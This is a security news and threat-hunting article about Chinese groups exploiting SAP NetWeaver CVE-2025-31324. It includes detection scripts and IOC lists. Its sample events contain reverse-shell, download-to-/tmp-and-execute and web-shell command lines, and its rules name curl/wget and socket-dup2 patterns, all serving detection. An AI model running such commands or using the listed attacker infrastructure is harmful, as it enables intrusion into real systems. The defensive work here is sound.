Chinese Hackers Targeting a Critical SAP NetWeaver Vulnerability

A major security flaw in SAP NetWeaver is under active exploitation by several Chinese state-linked hacking groups, and they’re going after some pretty high-value targets—ranging from U.S. oil companies to U.K. water utilities.

Researchers at cybersecurity firm EclecticIQ revealed that attackers are using CVE-2025-31324, a serious bug that lets them upload malicious files and run code remotely—no login required. Once in, they can take over systems and stay there as long as they like.

The targets are as serious as it gets: natural gas networks and water utilities in the U.K., medical device manufacturers and energy companies in the U.S., and financial ministries in Saudi Arabia.

The researchers discovered a server 15.204.56[.]106 controlled by the attackers, which had a treasure trove of event logs showing exactly what systems had been hacked. The logs confirmed successful breaches and even hinted at who’s next on the list.

EclecticIQ linked the activity to three China-based groups known as UNC5221, UNC5174, and CL-STA-0048. These groups have a history of targeting vulnerable public-facing systems like IIS, Apache Tomcat, and MS-SQL to install web shells and backdoors such as PlugX.

But they’re not the only ones. A yet-unnamed China-linked actor is also scanning the internet en masse for vulnerable SAP NetWeaver systems.

The attackers left behind some telling files:

  • “CVE-2025-31324-results.txt” logs 581 hacked SAP systems with web shells installed.

  • “服务数据_20250427_212229.txt” lists 800 more SAP NetWeaver domains they might go after next.

“These files give us a rare look into both the systems that have already been compromised and those being lined up for future attacks,” said EclecticIQ’s Arda Büyükkaya.

What the Hackers Are Doing Once They Get In

Once they break into a system using the NetWeaver vulnerability, the attackers install two different web shells to keep access and run commands remotely. Each group seems to have its own playbook:

  • CL-STA-0048 tried to create a reverse shell that connects back to another attacker-controlled IP.

  • UNC5221 dropped a Rust-based tool called KrustyLoader, which can install more malware, maintain persistence, and run commands.

  • UNC5174 used a loader called SNOWLIGHT that downloads a Go-based remote access tool called VShell and another backdoor named GOREVERSE.

"China-linked APTs are highly likely to continue targeting internet-exposed enterprise applications and edge devices to establish long-term strategic and persistence access to critical infrastructure networks globally," Büyükkaya said.

"Their focus on widely used platforms like SAP NetWeaver is a strategic move, as these systems are deeply integrated into enterprise environments and often host unpatched vulnerabilities."

More Bad News

On top of all this, researchers also found another serious bug in SAP NetWeaver—this one in the Visual Composer Metadata Uploader. Tracked as CVE-2025-42999 with a CVSS score of 9.1, it’s a deserialization issue that could let a privileged user upload malicious content.

Meanwhile, SAP-focused security firm Onapsis says attacker activity around these vulnerabilities is still heating up, even as some of the original attackers appear to have gone quiet. Others are jumping in to exploit the web shells that were already planted.

If your organization uses SAP NetWeaver, update immediately. These vulnerabilities are being actively exploited, and the attackers aren’t being subtle about it. Leaving these systems unpatched is like leaving the front door wide open.


Prevention

  • Patch ASAP: Install SAP Security Note #3594142 on all systems running SAP NetWeaver 7.1x with VCFRAMEWORK.

  • Workaround (if patching isn't an option): Follow the guidance in SAP Note #3593336, which recommends completely removing sap.com/devserver_metadataupload_ear.

  • Limit Access: Make sure the /developmentserver/metadatauploader path is only accessible from internal, authenticated IP ranges.

  • Strengthen Network Defenses: Use your firewall or web application firewall (WAF) to block any unauthenticated or public access to the vulnerable endpoint.

Threat Hunting & Detection

File-system IOC sweep (Linux & Windows SAP hosts)

  • Inspect for unauthorised web-executable files in the Visual Composer paths:

    • …/irj/servlet_jsp/irj/work 

    • …/irj/servlet_jsp/irj/work/sync

    • …/irj/servlet_jsp/irj/root

    • Automate with:
      find . -type f \( -name "*.jsp" -o -name "*.java" -o -name "*.class" \) -ls

    • Flag any of the following:

      • Known webshells (helper.jsp, cache.jsp, usage.jsp, .webhelper.jsp, forwardsap.jsp, 404_error.jsp, .h.jsp)

      • Randomised names:

        • 8-character pattern [a-z]{8}.jsp

        • Variable-length alphanumerics ≤ 10 chars
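As an added example (not part of the EclecticIQ write-up or any SAP tooling), the sweep above as a Python script: it walks the three Visual Composer directories, applies the known web-shell names and the two randomised-name patterns, and builds a throwaway directory of constructed files so it can be run offline. The instance root, the placeholder file contents and the order in which the checks are applied are assumptions; the page fixes only the paths and the name patterns.

```python
import re
import tempfile
from pathlib import Path

# Visual Composer paths from the hunting guidance, relative to the NetWeaver instance root.
VC_PATHS = (
    "irj/servlet_jsp/irj/work",
    "irj/servlet_jsp/irj/work/sync",
    "irj/servlet_jsp/irj/root",
)
KNOWN_WEBSHELLS = {"helper.jsp", "cache.jsp", "usage.jsp", ".webhelper.jsp",
                   "forwardsap.jsp", "404_error.jsp", ".h.jsp"}
WEB_EXEC_EXT = (".jsp", ".java", ".class")
RANDOM_8 = re.compile(r"^[a-z]{8}\.jsp$")                      # 8-character pattern
SHORT_ALNUM = re.compile(r"^[A-Za-z0-9]{1,10}\.(jsp|java|class)$")  # alphanumerics <= 10 chars


def classify(name):
    """Return why a file name is suspicious, or None if it is not web-executable."""
    if name in KNOWN_WEBSHELLS:
        return "known-webshell"
    if RANDOM_8.match(name):
        return "random-8char-jsp"
    if SHORT_ALNUM.match(name):
        return "short-alnum-name"
    if name.lower().endswith(WEB_EXEC_EXT):
        return "web-executable"
    return None


def sweep(instance_root):
    """List (relative path, reason) for every web-executable file in the VC paths."""
    findings = []
    for rel in VC_PATHS:
        directory = Path(instance_root) / rel
        if not directory.is_dir():
            continue
        # Non-recursive per listed path: work/sync is listed on its own, so nothing is counted twice.
        for p in sorted(directory.iterdir()):
            if p.is_file():
                reason = classify(p.name)
                if reason:
                    findings.append((p.relative_to(instance_root).as_posix(), reason))
    return findings


def build_demo_instance():
    """Create a temporary tree of constructed files so the sweep can run without an SAP host."""
    root = Path(tempfile.mkdtemp(prefix="nw-demo-"))
    samples = {
        "irj/servlet_jsp/irj/work/helper.jsp": "<%-- constructed placeholder, not a real shell --%>",
        "irj/servlet_jsp/irj/work/sync/abcdefgh.jsp": "<%-- constructed placeholder --%>",
        "irj/servlet_jsp/irj/root/x7k2.class": "",
        "irj/servlet_jsp/irj/root/index.html": "<html></html>",
    }
    for rel, body in samples.items():
        f = root / rel
        f.parent.mkdir(parents=True, exist_ok=True)
        f.write_text(body)
    return root


if __name__ == "__main__":
    for path, reason in sweep(build_demo_instance()):
        print(f"{reason:18} {path}")
```

On a real host, point `sweep()` at the instance root that contains `irj/`; the `web-executable` category catches anything the name heuristics miss, so a short review of that bucket against a known-good deployment is still needed.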

Web-access log analytics

  • Alert on unauthenticated calls to /developmentserver/metadatauploader

  • Highlight POST, GET, or HEAD requests with Content-Type: application/octet-stream that upload .jsp, .java, or .class files.

  • Trace hits on /irj/*.jsp?cmd= to surface webshell command execution.

Process & command-line heuristics (EDR/Sysmon)

  • bash or sh processes containing Base64 decode plus curl/wget:
    process == "bash" && command_includes("base64, -d").

  • curl or wget writing to /tmp (or %TEMP% on Windows) then chmod/execute.

  • Python one-liners opening sockets or duplicating FDs:
    process == "python*" && command_includes("socket") && command_includes("dup2").
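The three process heuristics above as an added example, written here rather than taken from the report: the bash/base64 and python/dup2 rules are evaluated per event, and the curl/wget-to-/tmp rule is kept stateful so that a later chmod or execution of the staged path is what fires it. The event field names (`image`, `cmdline`), the sample events and the regular expressions are this example's own constructions, not EDR or Sysmon output.

```python
import re

# Constructed process-creation events in the shape of Sysmon Event ID 1 / EDR telemetry
# (image = executable path, cmdline = full command line). Not real data.
SAMPLE_EVENTS = [
    {"image": "/bin/bash",
     "cmdline": "bash -c 'echo aGVsbG8= | base64 -d | sh; curl http://example.invalid/p -o /tmp/p'"},
    {"image": "/usr/bin/python3",
     "cmdline": "python3 -c 'import socket,os;s=socket.socket();os.dup2(s.fileno(),0)'"},
    {"image": "/usr/bin/curl", "cmdline": "curl -s http://example.invalid/a -o /tmp/a"},
    {"image": "/bin/sh", "cmdline": "sh -c 'chmod +x /tmp/a && /tmp/a'"},
    {"image": "/bin/bash", "cmdline": "bash -lc 'ls -la /home'"},
    {"image": "C:\\Windows\\System32\\curl.exe",
     "cmdline": "curl.exe http://example.invalid/b -o %TEMP%\\b.exe"},
    {"image": "C:\\Windows\\System32\\cmd.exe", "cmdline": "cmd.exe /c %TEMP%\\b.exe"},
]

BASE64_DECODE = re.compile(r"\bbase64\b.*?(\s-d\b|--decode\b)")
DOWNLOADER = re.compile(r"\b(curl|wget)\b")
# Output path of curl -o / wget -O that lands in /tmp or %TEMP%
STAGED_OUTPUT = re.compile(r"-[oO]\s+(/tmp/[^\s'\"&;|]+|%TEMP%[^\s'\"&;|]+)")


def image_name(ev):
    """Executable name without its directory, for both slash and backslash paths."""
    return re.split(r"[\\/]", ev["image"])[-1].lower()


def shell_base64_fetch(ev):
    # process == "bash"/"sh" && command includes a base64 decode && curl or wget
    return (image_name(ev) in ("bash", "sh")
            and BASE64_DECODE.search(ev["cmdline"]) is not None
            and DOWNLOADER.search(ev["cmdline"]) is not None)


def python_socket_dup2(ev):
    # process == "python*" && command includes "socket" && command includes "dup2"
    cmd = ev["cmdline"]
    return image_name(ev).startswith("python") and "socket" in cmd and "dup2" in cmd


def evaluate(events):
    """Stateless rules per event, plus a stateful rule across the sequence: a download
    staged under /tmp or %TEMP% that a later process chmods or executes."""
    alerts = []
    staged = {}  # staged path -> index of the event that wrote it
    for i, ev in enumerate(events):
        cmd = ev["cmdline"]
        if shell_base64_fetch(ev):
            alerts.append((i, "shell-base64-fetch"))
        if python_socket_dup2(ev):
            alerts.append((i, "python-socket-dup2"))
        if DOWNLOADER.search(cmd):
            for m in STAGED_OUTPUT.finditer(cmd):
                staged[m.group(1)] = i
        # Any later process that references a staged path (chmod or direct execution) fires the rule.
        for path, origin in list(staged.items()):
            if origin != i and re.search(re.escape(path) + r"(?!\S)", cmd):
                alerts.append((i, "tmp-stage-then-exec"))
                del staged[path]
    return alerts


if __name__ == "__main__":
    for idx, rule in evaluate(SAMPLE_EVENTS):
        print(f"event {idx}: {rule}  <- {SAMPLE_EVENTS[idx]['cmdline']}")
```

In production the stateful rule should be scoped per host and bounded in time (the dictionary here grows for the life of the run), and the parent process is worth adding as a condition, since on an SAP host these children should not be spawned by the Java server process at all.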

Network & proxy monitoring

  • Outbound connections from SAP servers to campaign infra:
    • Domains *.s3.amazonaws.com, *.trycloudflare.com, *.aliyuncs.com.

  • Detect large uploads or TLS tunnels initiated shortly after metadatauploader hits.
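An added example (not from the EclecticIQ report or any vendor product) that covers both the web-access log rules and the network-monitoring items above: the log rules run over constructed proxy/WAF records, and the flow rule correlates constructed outbound flow records with the time of each metadatauploader hit. The JSON field names, the SAP host address, the hostnames and the 10 MB upload threshold are assumptions. The campaign-domain list adds a `*.s3.*.amazonaws.com` glob because the regional bucket hostnames in the IOC section below would not match the `*.s3.amazonaws.com` form alone.

```python
import json
import re
from datetime import datetime, timedelta
from fnmatch import fnmatch

UPLOADER = "/developmentserver/metadatauploader"
WEB_EXEC = (".jsp", ".java", ".class")
CMD_SHELL = re.compile(r"^/irj/[^?]*\.jsp\?(?:.*&)?cmd=", re.I)   # /irj/*.jsp?cmd=
# Guidance lists *.s3.amazonaws.com; the regional bucket form from the IOC list is added.
CAMPAIGN_DOMAINS = ("*.s3.amazonaws.com", "*.s3.*.amazonaws.com",
                    "*.trycloudflare.com", "*.aliyuncs.com")
LARGE_UPLOAD_BYTES = 10_000_000     # assumed threshold; tune to the host's normal egress

# Constructed reverse-proxy/WAF access records for an SAP host (JSON lines; not real data).
ACCESS_LOG = """\
{"ts":"2025-04-27T21:20:01Z","src":"203.0.113.7","user":"-","method":"POST","path":"/developmentserver/metadatauploader","status":200,"content_type":"application/octet-stream","upload_name":"helper.jsp"}
{"ts":"2025-04-27T21:20:09Z","src":"203.0.113.7","user":"-","method":"GET","path":"/irj/helper.jsp?cmd=id","status":200,"content_type":"-","upload_name":"-"}
{"ts":"2025-04-27T21:25:40Z","src":"10.10.5.12","user":"vc_admin","method":"POST","path":"/developmentserver/metadatauploader","status":200,"content_type":"application/xml","upload_name":"model.xml"}
{"ts":"2025-04-27T21:30:00Z","src":"10.10.5.30","user":"jdoe","method":"GET","path":"/irj/portal","status":200,"content_type":"-","upload_name":"-"}
"""

# Constructed outbound flow records from a proxy or NetFlow collector (not real data).
SAP_HOST = "10.10.1.5"
FLOWS = [
    {"ts": "2025-04-27T21:21:30Z", "src": SAP_HOST, "dst_name": "example-bucket.s3.ap-northeast-2.amazonaws.com", "dport": 443, "bytes_out": 4096},
    {"ts": "2025-04-27T21:23:05Z", "src": SAP_HOST, "dst_name": "-", "dport": 8443, "bytes_out": 52_000_000},
    {"ts": "2025-04-27T23:10:00Z", "src": SAP_HOST, "dst_name": "db01.corp.example", "dport": 1433, "bytes_out": 900},
    {"ts": "2025-04-27T21:22:00Z", "src": "10.10.5.30", "dst_name": "example-bucket.s3.ap-northeast-2.amazonaws.com", "dport": 443, "bytes_out": 100},
]


def load(text):
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def parse_ts(s):
    return datetime.strptime(s, "%Y-%m-%dT%H:%M:%SZ")


def scan_access_log(text):
    """Apply the three web-log rules; returns (record index, rule, path) tuples."""
    alerts = []
    for n, rec in enumerate(load(text)):
        path = rec["path"]
        if path.split("?")[0] == UPLOADER and rec["user"] == "-":
            alerts.append((n, "unauth-metadatauploader", path))
        if (rec["method"] in ("POST", "GET", "HEAD")
                and rec["content_type"] == "application/octet-stream"
                and rec["upload_name"].lower().endswith(WEB_EXEC)):
            alerts.append((n, "octet-stream-webexec-upload", path))
        if CMD_SHELL.search(path):
            alerts.append((n, "jsp-cmd-execution", path))
    return alerts


def correlate(access_text, flows, sap_host, window_min=15):
    """Flag outbound flows from the SAP host that start within window_min minutes after any
    metadatauploader hit and look like campaign infra, a large upload, or a TLS tunnel."""
    hits = [parse_ts(r["ts"]) for r in load(access_text) if r["path"].split("?")[0] == UPLOADER]
    window = timedelta(minutes=window_min)
    alerts = []
    for f in flows:
        t = parse_ts(f["ts"])
        if f["src"] != sap_host or not any(h < t <= h + window for h in hits):
            continue
        reasons = []
        if any(fnmatch(f["dst_name"], pat) for pat in CAMPAIGN_DOMAINS):
            reasons.append("campaign-domain")
        if f["bytes_out"] >= LARGE_UPLOAD_BYTES:
            reasons.append("large-upload")
        if f["dport"] in (443, 8443):
            reasons.append("tls-after-uploader-hit")
        if reasons:
            alerts.append((f["ts"], f["dst_name"], reasons))
    return alerts


if __name__ == "__main__":
    for alert in scan_access_log(ACCESS_LOG) + correlate(ACCESS_LOG, FLOWS, SAP_HOST):
        print(alert)
```

The TLS-after-hit reason on its own is noisy on any host that legitimately talks to the internet; treat it as a scoring input that raises severity when it coincides with a campaign-domain match, a large upload, or an unauthenticated uploader hit from the same window.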

Authentication & component validation

  • Query NetWeaver System Info for VCFRAMEWORK; flag any instance where version is < patched build in SAP Note 3594142.

  • Hunt for successful logins that occur immediately after webshell activity or from atypical source IPs.


Indicators of Compromise (IOC)

Uncategorized China-Nexus actor (internet-wide CVE-2025-31324 scanning):

  • 15.204.56[.]106 (opendir server hosting logs, web-shells, target lists)

    • 4c9e60cc73e87da4cadc51523690d67549de4902e880974bfacf7f1a8dc40d7d

    • 63aa0c6890ec5c16b872fb6d070556447cd707dfba185d32a2c10c008dbdbcdd

CL-STA-0048 (reverse-shell & DNS-beaconing)

  • 43.247.135[.]53  (resolves to sentinelones.com, TCP 10443)

  • aaa.ki6zmfw3ps8q14rfbfczfq5qkhq8e12q.oastify.com

    • 54.77.139[.]23

    • 3.248.33[.]252

UNC5221 (KrustyLoader ➞ Sliver chain)

  • applr-malbbal.s3.ap-northeast-2.amazonaws[.]com

    • f92d0cf4d577c68aa615797d1704f40b14810d98b48834b241dd5c9963e113ec

  • abode-dashboard-media.s3.ap-south-1.amazonaws[.]com (also seen in earlier 2024 ops)

    • 47ff0ae9220a09bfad2a2fb1e2fa2c8ffe5e9cb0466646e2a940ac2e0cf55d04

    • 3f14dc65cc9e35989857dc1ec4bb1179ab05457f2238e917b698edb4c57ae7ce

    • 91f66ba1ad49d3062afdcc80e54da0807207d80a1b539edcdbd6e1bf99e7a2ca

  • brandnav-cms-storage.s3.amazonaws[.]com

    • c71da1dfea145798f881afd73b597336d87f18f8fd8f9a7f524c6749a5c664e4

    • b8e56de3792dbd0f4239b54cfaad7ece3bd42affa4fbbdd7668492de548b5df8

    • 0c2c8280701706e0772cb9be83502096e94ad4d9c21d576db0bc627e1e84b579

    • 5f3d1f17033d85b85f3bd5ae55cb720e53b31f1679d52986c8d635fd1ce0c08a

UNC5174 (SNOWLIGHT ➞ VShell chain & GOREVERSE)

  • 103.30.76[.]206 (TCP 443 used by SNOWLIGHT handshake)

    • 2dcbb4138f836bb5d7bc7d8101d3004848c541df6af997246d4b2a252f29d51a

    • 00920e109f16fe61092e70fca68a5219ade6d42b427e895202f628b467a3d22e

    • b9533ce8e428f16f3d0e1946f19a6f756ff11a532d0b7e61ae402837f46c678e

  • ocr-freespace.oss-cn-beijing.aliyuncs.com/2025/config.sh (GOREVERSE)

    • 888e953538ff668104f838120bc4d801c41adb07027db16281402a62f6ec29ef

    • 5e24b41a0bd076ec2b4e49e66daac94396c6180d00a45bcd7f4342a385fa1eed

IP addresses seen in SAP NetWeaver intrusions targeting victims:

45[.]155[.]222[.]14

15[.]204[.]56[.]106

159[.]65[.]34[.]242

138[.]68[.]61[.]82

192[.]243[.]115[.]175

107[.]175[.]77[.]118

15[.]188[.]246[.]198

138[.]197[.]40[.]133

43[.]247[.]135[.]53

23[.]95[.]123[.]5

215[.]204[.]56[.]106

27[.]25[.]148[.]183

65[.]20[.]81[.]172

3[.]125[.]102[.]39

212[.]11[.]64[.]225

130[.]185[.]118[.]247

212[.]192[.]15[.]213

52[.]172[.]31[.]130

149[.]62[.]46[.]132

196[.]251[.]85[.]31

162[.]248[.]53[.]119

103[.]30[.]76[.]206

206[.]237[.]1[.]201

141[.]164[.]35[.]53

107[.]174[.]81[.]24

208[.]76[.]55[.]39

52[.]185[.]157[.]28

65[.]49[.]235[.]210

185[.]143[.]222[.]215

185[.]165[.]169[.]31

46[.]29[.]161[.]198

62[.]234[.]24[.]38

64[.]233[.]180[.]99

45[.]77[.]119[.]13

23[.]227[.]196[.]204

184[.]174[.]96[.]39

96[.]9[.]124[.]89

156[.]238[.]224[.]227

153[.]92[.]4[.]236

45[.]61[.]137[.]162

64[.]95[.]11[.]95

142[.]202[.]4[.]28

154[.]37[.]221[.]237
